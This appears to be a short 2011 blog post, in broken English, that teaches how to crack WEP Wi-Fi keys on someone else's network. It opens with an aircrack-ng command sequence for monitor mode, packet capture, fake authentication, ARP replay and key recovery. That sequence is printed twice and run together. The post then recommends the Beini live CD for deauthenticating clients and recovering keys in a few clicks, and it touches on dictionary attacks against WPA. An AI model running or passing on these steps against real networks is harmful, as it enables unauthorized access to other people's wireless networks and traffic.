airmon-ng start wlan0
airodump-ng mon0
copy BSSID and CHANNEL
New Client airodump-ng -w wep -c channel --bssid INPUT mon0
New Client aireplay-ng -1 0 -a INPUT mon0
New client aireplay-ng -3 -b INPUT mon0
final aircrack-ng wep-01.cap airmon-ng start wlan0
airodump-ng mon0
copy BSSID and CHANNEL
New Client airodump-ng -w wep -c channel --bssid INPUT mon0
New Client aireplay-ng -1 0 -a INPUT mon0
New client aireplay-ng -3 -b INPUT mon0
final aircrack-ng wep-01.cap
**The code are sometime need some changes.
Why i'm not suggest to use backtrack..
- File is very big-last time I download Backtrack 5.0 the size about 1.06Gb
- I have tested Backtrack 4.2 release and luckily I get to crack WEP just after learning for few days...
- Waste my time for cracking WPA - what I understands it needs Dictionary that contains about all words + characters + numbers so it can run dictionary attacks so you'll need a complete dictionary to crack WPA.
The next Part is to be interesting for us..very easy and even a baby can do it..hahaha...
What You need is Beini 1.2.3 version, the latest (mybe August or September 2011 release) but I cant reach the official website now (13 Sept).
**the development of Beini have been stop said Zhao(the developer)
Why I suggest it to You:
- Easy to use
- Just few clicks to crack WEP
- Download Beini latest version..The version 1.1.2 have some problem with driver.. but ONLY with some wireless model and can be repaired.
- You can put Beini in USB or CD. I recommended to use CD(just few cents) rather use usb( unless you have pretty much) but for me I only have some USB and the Beini size only 42MB. (not worth 4Gb USB) . The other way is using VMware ..I'm not try it with version 1.2.3 but with version 1.2.2 would not detect the wireless card if you are using laptop.
- Make sure you change the first boot to CD/DVD or USB (depend where you burn the software)
- Restart computer,insert CD/USB and press ENTER when your computer ask for it..
- The easiest way to crack is to wait the owner is Online. It's mean there will be client list .
- You just need to click Deauth and Start. Leave it doing the job till the KEY FOUND
- other way you can watch the tutorial here
- Click Here: Download Free
Post a Comment